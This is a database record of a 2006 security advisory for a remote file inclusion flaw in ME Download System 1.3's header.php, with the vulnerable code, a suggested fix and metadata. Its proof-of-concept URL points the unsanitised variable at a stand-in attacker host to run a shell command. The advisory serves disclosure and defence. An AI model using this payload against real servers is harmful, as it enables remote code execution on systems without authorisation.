{"sourceData": "\n +--------------------------------------------------------------------\r\n+\r\n+ ME Download System 1.3 Remote File Inclusion\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Affected Software .: ME Download System 1.3\r\n+ Venedor ...........: http://www.ehmig.net/\r\n+ Class .............: Remote File Inclusion\r\n+ Risk ..............: high (Remote File Execution)\r\n+ Found by ..........: Philipp Niedziela\r\n+ Original advisory .: http://www.bb-pcsecurity.de/sicherheit_282.htm\r\n+ Contact ...........: webmaster[at]bb-pcsecurity[.]de\r\n+ Affected Files ....: templates/header.php\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Code of /templates/header.php:\r\n+\r\n+ .....\r\n+ <?php\r\n+ include($Vb8878b936c2bd8ae0cab.'/settings_style.php');\r\n+ .....\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ $Vb8878b936c2bd8ae0cab is not properly sanitized before being used\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Solution:\r\n+ Include config-File in header.php:\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ PoC:\r\n+ http://[target]/templates/header.php?$Vb8878b936c2bd8ae0cab=http://evilsite.com?cmd=ls\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Notice:\r\n+ Maybe there are more RFI-Vulns in other files, but it's very hard\r\n+ to read this code.\r\n+\r\n+ Venedor has been contacted, but I didn't received any answer.\r\n+\r\n+--------------------------------------------------------------------\r\n+\r\n+ Greets:\r\n+ Krini Gonzales\r\n+\r\n+-------------------------[ E O F ]----------------------------------\r\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-5693", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-5693", "type": "seebug", "viewCount": 1, "references": [], "lastseen": "2017-11-19T22:19:52", "published": "2006-12-05T00:00:00", "cvelist": [], "id": "SSV:5693", "enchantments_done": [], "modified": "2006-12-05T00:00:00", "title": "ME Download System <= 1.3 (header.php) Remote Inclusion Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2017-11-19T22:19:52", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T22:19:52", "rev": 2}, "vulnersScore": 0.0}}

{}